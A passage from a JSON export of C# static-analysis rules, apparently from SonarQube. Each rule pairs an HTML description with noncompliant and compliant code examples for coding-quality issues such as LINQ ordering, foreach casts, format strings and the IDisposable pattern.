<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = personList\n  .OrderBy(person =&gt; person.Age)\n  .OrderBy(person =&gt; person.Name)  \/\/ Noncompliant\n  .ToList();  \/\/ x is sorted by Name, not sub-sorted\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = personList\n  .OrderBy(person =&gt; person.Age)\n  .ThenBy(person =&gt; person.Name)\n  .ToList();\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3217","repo":"csharpsquid","name":"\"Explicit\" conversions of \"foreach\" loops should not be used","htmlDesc":"<p>The <code>foreach<\/code> statement was introduced in the C# language prior to generics to make it easier to work with the non-generic collections\navailable at that time such as <code>ArrayList<\/code>. The <code>foreach<\/code> statements allows you to downcast elements of a collection of\n<code>Object<\/code>s to any other type. The problem is that to achieve the cast, the <code>foreach<\/code> statements silently performs\n<code>explicit<\/code> type conversion, which at runtime can result in an <code>InvalidCastException<\/code>.<\/p>\n<p>C# code iterating on generic collections or arrays should not rely on <code>foreach<\/code> statement's silent <code>explicit<\/code>\nconversions.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Fruit { }\npublic class Orange : Fruit { }\npublic class Apple : Fruit { }\n\nclass MyTest\n{\n  public void Test()\n  {\n    var fruitBasket = new List&lt;Fruit&gt;();\n    fruitBasket.Add(new Orange());\n    fruitBasket.Add(new Orange());\n    \/\/ fruitBasket.Add(new Apple());  \/\/ uncommenting this line will make both foreach below throw an InvalidCastException\n\n    foreach (Fruit fruit in fruitBasket)\n    {\n      var orange = (Orange)fruit; \/\/ This \"explicit\" conversion is hidden within the foreach loop below\n      ...\n    }\n\n    foreach (Orange orange in fruitBasket) \/\/ Noncompliant\n    {\n      ...\n    
}\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar fruitBasket = new List&lt;Orange&gt;();\nfruitBasket.Add(new Orange());\nfruitBasket.Add(new Orange());\n\/\/ fruitBasket.Add(new Apple());  \/\/ uncommenting this line won't compile\n\nforeach (Orange orange in fruitBasket)\n{\n  ...\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nvar fruitBasket = new List&lt;Fruit&gt;();\nfruitBasket.Add(new Orange());\nfruitBasket.Add(new Orange());\nfruitBasket.Add(new Apple());\n\nforeach (Orange orange in fruitBasket.OfType&lt;Orange&gt;())\n{\n  ...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule ignores iterations on collections of <code>object<\/code>s. This includes legacy code that uses <code>ArrayList<\/code>. Furthermore, the\nrule does not report on cases when user defined conversions are being called. <\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3237","repo":"csharpsquid","name":"\"value\" parameters should be used","htmlDesc":"<p>In property and indexer <code>set<\/code> methods, and in event <code>add<\/code> and <code>remove<\/code> methods, the implicit <code>value<\/code>\nparameter holds the value the accessor was called with. 
Not using the <code>value<\/code> means that the accessor ignores the caller's intent which\ncould cause unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate int count;\npublic int Count\n{\n  get { return count; }\n  set { count = 42; } \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate int count;\npublic int Count\n{\n  get { return count; }\n  set { count = value; }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\npublic int Count\n{\n  get { return count; }\n  set { throw new InvalidOperationException(); }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3244","repo":"csharpsquid","name":"Anonymous delegates should not be used to unsubscribe from Events","htmlDesc":"<p>It is possible to subscribe to events with anonymous delegates, but having done so, it is impossible to unsubscribe from them. That's because the\nprocess of subscribing adds the delegate to a list. The process of unsubscribing essentially says: remove <em>this item<\/em> from the subscription\nlist. 
But because an anonymous delegate was used in both cases, the unsubscribe attempt tries to remove a different item from the list than was added.\nThe result: <code>NOOP<\/code>.<\/p>\n<p>Instead, save the delegate to a variable and use the variable to subscribe and unsubscribe.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlistView.PreviewTextInput += (obj,args) =&gt;\n        listView_PreviewTextInput(obj,args,listView);\n\n\/\/ ...\n\nlistView.PreviewTextInput -= (obj, args) =&gt;\n        listView_PreviewTextInput(obj, args, listView); \/\/ Noncompliant; this delegate was never subscribed\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nEventHandler func = (obj,args) =&gt; listView_PreviewTextInput(obj,args,listView);\n\nlistView.PreviewTextInput += func;\n\n\/\/ ...\n\nlistView.PreviewTextInput -= func;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3247","repo":"csharpsquid","name":"Duplicate casts should not be made","htmlDesc":"<p>Because the <code>is<\/code> operator performs a cast if the object is not null, using <code>is<\/code> to check type and then casting the same\nargument to that type, necessarily performs two casts. The same result can be achieved more efficiently with a single cast using <code>as<\/code>,\nfollowed by a null-check.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x is Fruit)  \/\/ Noncompliant\n{\n  var f = (Fruit)x; \/\/ or x as Fruit\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar f = x as Fruit;\nif (f != null)\n{\n  \/\/ code\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3256","repo":"csharpsquid","name":"\"string.IsNullOrEmpty\" should be used","htmlDesc":"<p>Using <code>string.Equals<\/code> to determine if a string is empty is significantly slower than using <code>string.IsNullOrEmpty()<\/code> or\nchecking for <code>string.Length == 0<\/code>. 
<code>string.IsNullOrEmpty()<\/code> is both clear and concise, and therefore preferred to laborious,\nerror-prone, manual null- and emptiness-checking.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\"\".Equals(name); \/\/ Noncompliant\n!name.Equals(\"\"); \/\/ Noncompliant\nname.Equals(string.Empty); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nname != null &amp;&amp; name.Length &gt; 0 \/\/ Compliant but more error prone\n!string.IsNullOrEmpty(name)\nstring.IsNullOrEmpty(name)\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3257","repo":"csharpsquid","name":"Declarations and initializations should be as concise as possible","htmlDesc":"<p>Unnecessarily verbose declarations and initializations make it harder to read the code, and should be simplified.<\/p>\n<p>Specifically the following should be omitted when they can be inferred:<\/p>\n<ul>\n  <li> array element type <\/li>\n  <li> array size <\/li>\n  <li> <code>new DelegateType<\/code> <\/li>\n  <li> <code>new Nullable&lt;Type&gt;<\/code> <\/li>\n  <li> object or collection initializers (<code>{<\/code>}) <\/li>\n  <li> type of lambda expression parameters <\/li>\n  <li> parameter declarations of anonymous methods when the parameters are not used. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar l = new List&lt;int&gt;() {}; \/\/ Noncompliant, {} can be removed\nvar o = new object() {}; \/\/ Noncompliant, {} can be removed\n\nvar ints = new int[] {1, 2, 3}; \/\/ Noncompliant, int can be omitted\nints = new int[3] {1, 2, 3}; \/\/ Noncompliant, the size specification can be removed\n\nint? i = new int?(5); \/\/ Noncompliant new int? 
could be omitted, it can be inferred from the declaration, and there's implicit conversion from T to T?\nvar j = new int?(5);\n\nFunc&lt;int, int&gt; f1 = (int i) =&gt; 1; \/\/Noncompliant, can be simplified\n\nclass Class\n{\n    private event EventHandler MyEvent;\n\n    public Class()\n    {\n        MyEvent += new EventHandler((a,b)=&gt;{ }); \/\/ Noncompliant, needlessly verbose\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar l = new List&lt;int&gt;();\nvar o = new object();\n\nvar ints = new [] {1, 2, 3};\nints = new [] {1, 2, 3};\n\nint? i = 5;\nvar j = new int?(5);\n\nFunc&lt;int, int&gt; f1 = (i) =&gt; 1;\n\nclass Class\n{\n    private event EventHandler MyEvent;\n\n    public Class()\n    {\n        MyEvent += (a,b)=&gt;{ };\n    }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3376","repo":"csharpsquid","name":"Attribute, EventArgs, and Exception type names should end with the type being extended","htmlDesc":"<p>Adherence to the standard naming conventions makes your code not only more readable, but more usable. 
For instance, <code>class FirstAttribute :\nAttribute<\/code> can be used simply with <code>First<\/code>, but you must use the full name for <code>class AttributeOne : Attribute<\/code>.<\/p>\n<p>This rule raises an issue when classes extending <code>Attribute<\/code>, <code>EventArgs<\/code>, or <code>Exception<\/code>, do not end with their\nparent class names.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass AttributeOne : Attribute  \/\/ Noncompliant\n{\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass FirstAttribute : Attribute\n{\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>If a class' direct base class doesn't follow the convention, then no issue is reported on the class itself, regardless of whether or not it\nconforms to the convention.<\/p>\n<pre>\nclass Timeout : Exception \/\/ Noncompliant\n{\n}\nclass ExtendedTimeout : Timeout \/\/ Ignored; doesn't conform to convention, but the direct base doesn't conform either\n{\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3444","repo":"csharpsquid","name":"Interfaces should not simply inherit from base interfaces with colliding members","htmlDesc":"<p>When an interface inherits from two interfaces that both define a member with the same name, trying to access that member through the derived\ninterface will result in the compiler error <code>CS0229 Ambiguity between 'IBase1.SomeProperty' and 'IBase2.SomeProperty'<\/code>.<\/p>\n<p>So instead, every caller will be forced to cast instances of the derived interface to one or the other of its base interfaces to resolve the\nambiguity and be able to access the member. Instead, it is better to resolve the ambiguity in the definition of the derived interface either by:<\/p>\n<ul>\n  <li> renaming the member in one of the base interfaces to remove the collision <\/li>\n  <li> also defining that member in the derived interface. 
Use this only if all copies of the member are meant to hold the same value. <\/li>\n<\/ul>\n<p> <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic interface IBase1\n{\n  string SomeProperty { get; set; }\n}\n\npublic interface IBase2\n{\n  string SomeProperty { get; set; }\n}\n\npublic interface IDerived : IBase1, IBase2 \/\/ Noncompliant, accessing IDerived.SomeProperty is ambiguous\n{\n}\n\npublic class MyClass : IDerived\n{\n  \/\/ Implements both IBase1.SomeProperty and IBase2.SomeProperty\n  public string SomeProperty { get; set; } = \"Hello\";\n\n  public static void Main()\n  {\n    MyClass myClass = new MyClass();\n    Console.WriteLine(myClass.SomeProperty); \/\/ Writes \"Hello\" as expected\n    Console.WriteLine(((IBase1)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n    Console.WriteLine(((IBase2)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n    Console.WriteLine(((IDerived)myClass).SomeProperty); \/\/ Error CS0229 Ambiguity between 'IBase1.SomeProperty' and 'IBase2.SomeProperty'\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic interface IDerived : IBase1, IBase2\n{\n  new string SomeProperty { get; set; }\n}\n\npublic class MyClass : IDerived\n{\n  \/\/ Implements IBase1.SomeProperty, IBase2.SomeProperty and IDerived.SomeProperty\n  public string SomeProperty { get; set; } = \"Hello\";\n\n  public static void Main()\n  {\n    MyClass myClass = new MyClass();\n    Console.WriteLine(myClass.SomeProperty); \/\/ Writes \"Hello\" as expected\n    Console.WriteLine(((IBase1)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n    Console.WriteLine(((IBase2)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n    Console.WriteLine(((IDerived)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\npublic interface IBase1\n{\n  string SomePropertyOne { get; set; }\n}\n\npublic interface IBase2\n{\n  string SomePropertyTwo { get; set; }\n}\n\npublic interface IDerived 
: IBase1, IBase2\n{\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3445","repo":"csharpsquid","name":"Exceptions should not be explicitly rethrown","htmlDesc":"<p>When rethrowing an exception, you should do it by simply calling <code>throw;<\/code> and not <code>throw exc;<\/code>, because the stack trace is\nreset with the second syntax, making debugging a lot harder.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntry\n{}\ncatch(ExceptionType1 exc)\n{\n  Console.WriteLine(exc);\n  throw exc; \/\/ Noncompliant; stacktrace is reset\n}\ncatch (ExceptionType2 exc)\n{\n  throw new Exception(\"My custom message\", exc);  \/\/ Compliant; stack trace preserved\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ntry\n{}\ncatch(ExceptionType1 exc)\n{\n  Console.WriteLine(exc);\n  throw;\n}\ncatch (ExceptionType2 exc)\n{\n  throw new Exception(\"My custom message\", exc);\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3453","repo":"csharpsquid","name":"Classes should not have only \"private\" constructors","htmlDesc":"<p>A class with only <code>private<\/code> constructors can't be instantiated, thus, it seems to be pointless code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class MyClass \/\/ Noncompliant\n{\n  private MyClass() { ... }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyClass\n{\n  public MyClass() { ... }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Classes that themselves access their private constructors (singletons or smart enums) are ignored. 
Classes with only <code>static<\/code> members\nare also ignored because they are covered by Rule S1118.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3456","repo":"csharpsquid","name":"\"string.ToCharArray()\" should not be called redundantly","htmlDesc":"<p><code>ToCharArray<\/code> can be omitted when the operation on the array could have been done directly on the string, such as when iterating over\nthe characters in a string, and when accessing a character in a string via an array index. In those cases, explicit <code>ToCharArray<\/code> calls\nshould be omitted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring str = \"some string\";\nforeach (var c in str.ToCharArray()) \/\/ Noncompliant\n{\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring str = \"some string\";\nforeach (var c in str)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3457","repo":"csharpsquid","name":"Composite format strings should be used correctly","htmlDesc":"<p>Because composite format strings are interpreted at runtime, rather than validated by the compiler, they can contain errors that lead to unexpected\nbehaviors or runtime errors. This rule statically validates the good behavior of composite formats when calling the methods of\n<code>String.Format<\/code>, <code>StringBuilder.AppendFormat<\/code>, <code>Console.Write<\/code>, <code>Console.WriteLine<\/code>,\n<code>TextWriter.Write<\/code>, <code>TextWriter.WriteLine<\/code>, <code>Debug.WriteLine(String,\u2002Object[])<\/code>,\n<code>Trace.TraceError(String,\u2002Object[])<\/code>, <code>Trace.TraceInformation(String,\u2002Object[])<\/code>,\n<code>Trace.TraceWarning(String,\u2002Object[])<\/code> and <code>TraceSource.TraceInformation(String,\u2002Object[])<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ns = string.Format(\"{0}\", arg0, arg1); \/\/ Noncompliant, arg1 is declared but not used.\ns = string.Format(\"{0} {2}\", arg0, arg1, arg2); \/\/ Noncompliant, the format item with index 1 is missing so arg1 will not be used.\ns = string.Format(\"foo\"); \/\/ Noncompliant, there is no need to use string.Format here.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ns = string.Format(\"{0}\", arg0);\ns = string.Format(\"{0} {1}\", arg0, arg2);\ns = \"foo\";\n<\/pre>\n<h2>Exceptions<\/h2>\n<ul>\n  <li> No issue is raised if the format string is not a <code>const<\/code>. <\/li>\n<\/ul>\n<pre>\nvar pattern = \"{0} {1} {2}\";\nvar res = string.Format(pattern, 1, 2); \/\/ Compliant, not const string are not recognized\n<\/pre>\n<ul>\n  <li> No issue is raised if the argument is not an inline creation array. <\/li>\n<\/ul>\n<pre>\nvar array = new int[] {};\nvar res = string.Format(\"{0} {1}\", array); \/\/ Compliant we don't know the size of the array\n<\/pre>\n<ul>\n  <li> This rule doesn't check whether the format specifier (defined after the <code>:<\/code>) is actually valid. <\/li>\n<\/ul>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/wQA1\">CERT, FIO47-C.<\/a> - Use valid format strings <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/e4EyAQ\">CERT, FIO00-CPP.<\/a> - Take care when creating format strings <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3458","repo":"csharpsquid","name":"Empty \"case\" clauses that fall through to the \"default\" should be omitted","htmlDesc":"<p>Empty <code>case<\/code> clauses that fall through to the default are useless. Whether or not such a <code>case<\/code> is present, the\n<code>default<\/code> clause will be invoked. 
Such <code>case<\/code>s simply clutter the code, and should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch(ch)\n{\n  case 'a' :\n    HandleA();\n    break;\n  case 'b' :\n    HandleB();\n    break;\n  case 'c' :  \/\/ Noncompliant\n  default:\n    HandleTheRest();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch(ch)\n{\n  case 'a' :\n    HandleA();\n    break;\n  case 'b' :\n    HandleB();\n    break;\n  default:\n    HandleTheRest();\n    break;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3532","repo":"csharpsquid","name":"Empty \"default\" clauses should be removed","htmlDesc":"<p>The <code>default<\/code> clause should take appropriate action. Having an empty <code>default<\/code> is a waste of keystrokes.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nenum Fruit\n{\n  Apple,\n  Orange,\n  Banana\n}\n\nvoid PrintName(Fruit fruit)\n{\n  switch(fruit)\n  {\n    case Fruit.Apple:\n      Console.WriteLine(\"apple\");\n      break;\n    default:  \/\/Noncompliant\n      break;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nenum Fruit\n{\n  Apple,\n  Orange,\n  Banana\n}\n\nvoid PrintName(Fruit fruit)\n{\n  switch(fruit)\n  {\n    case Fruit.Apple:\n      Console.WriteLine(\"apple\");\n      break;\n    default:\n      throw new NotSupportedException();\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nvoid PrintName(Fruit fruit)\n{\n  switch(fruit)\n  {\n    case Fruit.Apple:\n      Console.WriteLine(\"apple\");\n      break;\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3604","repo":"csharpsquid","name":"Member initializer values should not be redundant","htmlDesc":"<p>Fields, properties and events can be initialized either inline or in the constructor. 
Initializing them inline and in the constructor at the same\ntime is redundant; the inline initialization will be overridden.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Person\n{\n  int age = 42; \/\/ Noncompliant\n  public Person(int age)\n  {\n    this.age = age;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Person\n{\n  int age;\n  public Person(int age)\n  {\n    this.age = age;\n  }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule doesn't report an issue if not all constructors initialize the field. If the field is initialized inline to its default value, then\n<a href='\/coding_rules#rule_key=csharpsquid%3AS3052'>S3052<\/a> already reports an issue on the initialization. <\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3871","repo":"csharpsquid","name":"Exception types should be \"public\"","htmlDesc":"<p>The point of having custom exception types is to convey more information than is available in standard types. But custom exception types must be\n<code>public<\/code> for that to work. <\/p>\n<p>If a method throws a non-public exception, the best you can do on the caller's side is to <code>catch<\/code> the closest <code>public<\/code> base\nof the class. That is, you lose all that custom information you created the exception type to pass. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninternal class MyException : Exception   \/\/ Noncompliant\n{\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyException : Exception\n{\n  \/\/ ...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule ignores Exception types that are not derived directly from <code>System.Exception<\/code>, <code>System.SystemException<\/code>, or\n<code>System.ApplicationException<\/code>.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3872","repo":"csharpsquid","name":"Parameter names should not duplicate the names of their methods","htmlDesc":"<p>The name of a method should communicate what it does, and the names of its parameters should indicate how they're used. If a method and its\nparameter have the same name it is an indication that one of these rules of thumb has been broken, if not both. Even if by some trick of language\nthat's not the case, it is still likely to confuse callers and maintainers.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic void Login(string login)  \/\/ Noncompliant\n{\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic void Login(string userName)\n{\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3874","repo":"csharpsquid","name":"\"out\" and \"ref\" parameters should not be used","htmlDesc":"<p>Passing a parameter by reference, which is what happens when you use the <code>out<\/code> or <code>ref<\/code> parameter modifiers, means that the\nmethod will receive a pointer to the argument, rather than the argument itself. If the argument was a value type, the method will be able to change\nthe argument's values. If it was a reference type, then the method receives a pointer to a pointer, which is usually not what was intended. 
Even when\nit is what was intended, this is the sort of thing that's difficult to get right, and should be used with caution.<\/p>\n<p>This rule raises an issue when <code>out<\/code> or <code>ref<\/code> is used on a non-<code>Optional<\/code> parameter in a public method.\n<code>Optional<\/code> parameters are covered by S3447.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic void GetReply(\n         ref MyClass input, \/\/ Noncompliant\n         out string reply)  \/\/ Noncompliant\n{ ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic string GetReply(MyClass input)\n{ ... }\n\npublic bool TryGetReply(MyClass input, out string reply)\n{ ... }\n\npublic ReplyData GetReply(MyClass input)\n{ ... }\n\ninternal void GetReply(ref MyClass input, out string reply)\n{ ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise issues for:<\/p>\n<p>- non-public methods<\/p>\n<p>- methods with only 'out' parameters, name starting with \"Try\" and return type bool.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3875","repo":"csharpsquid","name":"\"operator==\" should not be overloaded on reference types","htmlDesc":"<p>The use of <code>==<\/code> to compare to objects is expected to do a reference comparison. That is, it is expected to return <code>true<\/code> if\nand only if they are the same object instance. Overloading the operator to do anything else will inevitably lead to the introduction of bugs by\ncallers. On the other hand, overloading it to do exactly that is pointless; that's what <code>==<\/code> does by default.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic static bool operator== (MyType x, MyType y) \/\/ Noncompliant\n{\n<\/pre>\n<h2>Exceptions<\/h2>\n<ul>\n  <li> Classes with overloaded <code>operator +<\/code> or <code>operator -<\/code> methods are ignored. 
<\/li>\n  <li> Classes that implement <code>IComparable&lt;T&gt;<\/code> or <code>IEquatable&lt;T&gt;<\/code> most probably behave as a value-type objects and\n  so are ignored. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3881","repo":"csharpsquid","name":"\"IDisposable\" should be implemented correctly","htmlDesc":"<p>The <code>IDisposable<\/code> interface is a mechanism to release unmanaged resources, if not implemented correctly this could result in resource\nleaks or more severe bugs.<\/p>\n<p>This rule raises an issue when the recommended dispose pattern, as defined by Microsoft, is not adhered to. See the <strong>Compliant\nSolution<\/strong> section for examples.<\/p>\n<p>Satisfying the rule's conditions will enable potential derived classes to correctly dispose the members of your class:<\/p>\n<ul>\n  <li> <code>sealed<\/code> classes are not checked. <\/li>\n  <li> If a base class implements <code>IDisposable<\/code> your class should not have <code>IDisposable<\/code> in the list of its interfaces. In such\n  cases it is recommended to override the base class's <code>protected virtual void Dispose(bool)<\/code> method or its equivalent. <\/li>\n  <li> The class should not implement <code>IDisposable<\/code> explicitly, e.g. the <code>Dispose()<\/code> method should be public. <\/li>\n  <li> The class should contain <code>protected virtual void Dispose(bool)<\/code> method. This method allows the derived classes to correctly dispose\n  the resources of this class. <\/li>\n  <li> The content of the <code>Dispose()<\/code> method should be a single invocation of <code>Dispose(true)<\/code>. <\/li>\n  <li> If the class has a finalizer, i.e. a destructor, the only code in its body should be a single invocation of <code>Dispose(false)<\/code>. 
<\/li>\n  <li> If the class has a finalizer, an additional call to <code>GC.SuppressFinalize(this)<\/code> is required in the <code>Dispose()<\/code> method.\n  <\/li>\n  <li> If the class inherits from a class that implements <code>IDisposable<\/code> it must call the <code>Dispose<\/code>, or\n  <code>Dispose(bool)<\/code> method of the base class from within its own implementation of <code>Dispose<\/code> or <code>Dispose(bool)<\/code>,\n  respectively. This ensures that all resources from the base class are properly released. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo1 : IDisposable \/\/ Noncompliant - provide protected overridable implementation of Dispose(bool) on Foo or mark the type as sealed.\n{\n    public void Dispose() \/\/ Noncompliant - should contain only a call to Dispose(true) and then GC.SuppressFinalize(this)\n    {\n        \/\/ Cleanup\n    }\n}\n\npublic class Foo2 : IDisposable\n{\n    void IDisposable.Dispose() \/\/ Noncompliant - Dispose() should be public\n    {\n        Dispose(true);\n        GC.SuppressFinalize(this);\n    }\n\n    public virtual void Dispose() \/\/ Noncompliant - Dispose() should be sealed\n    {\n        Dispose(true);\n        GC.SuppressFinalize(this);\n    }\n}\n\npublic class Foo3 : IDisposable\n{\n    public void Dispose()\n    {\n        Dispose(true);\n        GC.SuppressFinalize(this);\n    }\n\n    protected virtual void Dispose(bool disposing)\n    {\n        \/\/ Cleanup\n    }\n\n    ~Foo3() \/\/ Noncompliant - Modify Foo.~Foo() so that it calls Dispose(false) and then returns.\n    {\n        \/\/ Cleanup\n    }\n}{code}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ Sealed class\npublic sealed class Foo1 : IDisposable\n{\n    public void Dispose()\n    {\n        \/\/ Cleanup\n    }\n}\n\n\/\/ Simple implementation\npublic class Foo2 : IDisposable\n{\n    public void Dispose()\n    {\n        Dispose(true);\n    }\n\n    protected virtual void Dispose(bool 
disposing)\n    {\n        \/\/ Cleanup\n    }\n}\n\n\/\/ Implementation with a finalizer\npublic class Foo3 : IDisposable\n{\n    public void Dispose()\n    {\n        Dispose(true);\n        GC.SuppressFinalize(this);\n    }\n\n    protected virtual void Dispose(bool disposing)\n    {\n        \/\/ Cleanup\n    }\n\n    ~Foo3()\n    {\n        Dispose(false);\n    }\n}\n\n\/\/ Base disposable class\npublic class Foo4 : DisposableBase\n{\n    protected override void Dispose(bool disposing)\n    {\n        \/\/ Cleanup\n        \/\/ Do not forget to call base\n        base.Dispose(disposing);\n    }\n}\n<\/pre>\n<h2>See<\/h2>\n<p>Refer to <\/p>\n<ul>\n  <li> <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/498928w2.aspx\">MSDN<\/a> for complete documentation on the dispose pattern. <\/li>\n  <li> <a href=\"http:\/\/blog.stephencleary.com\/2009\/08\/how-to-implement-idisposable-and.html\">Stephen Cleary<\/a> for excellent Q&amp;A about\n  IDisposable <\/li>\n  <li> <a href=\"http:\/\/pragmateek.com\/c-scope-your-global-state-changes-with-idisposable-and-the-using-statement\/\">Pragma Geek<\/a> for additional\n  usages of IDisposable, beyond releasing resources. 
<\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3909","repo":"csharpsquid","name":"Collections should implement the generic interface","htmlDesc":"<p>The NET Framework 2.0 introduced the generic interface <code>System.Collections.Generic.IEnumerable&lt;T&gt;<\/code> and it should be preferred over\nthe older, non generic, interfaces.<\/p>\n<p>This rule raises an issue when a public type implements <code>System.Collections.IEnumerable<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\nusing System.Collections;\n\npublic class MyData\n{\n  public MyData()\n  {\n  }\n}\n\npublic class MyList : CollectionBase \/\/ Noncompliant\n{\n  public void Add(MyData data)\n  {\n    InnerList.Add(data);\n  }\n\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\nusing System.Collections.ObjectModel;\n\npublic class MyData\n{\n  public MyData()\n  {\n  }\n}\n\npublic class MyList : Collection&lt;MyData&gt;\n{\n  \/\/ Implementation...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3962","repo":"csharpsquid","name":"\"static readonly\" constants should be \"const\" instead","htmlDesc":"<p>The value of a <code>static readonly<\/code> field is computed at runtime while the value of a 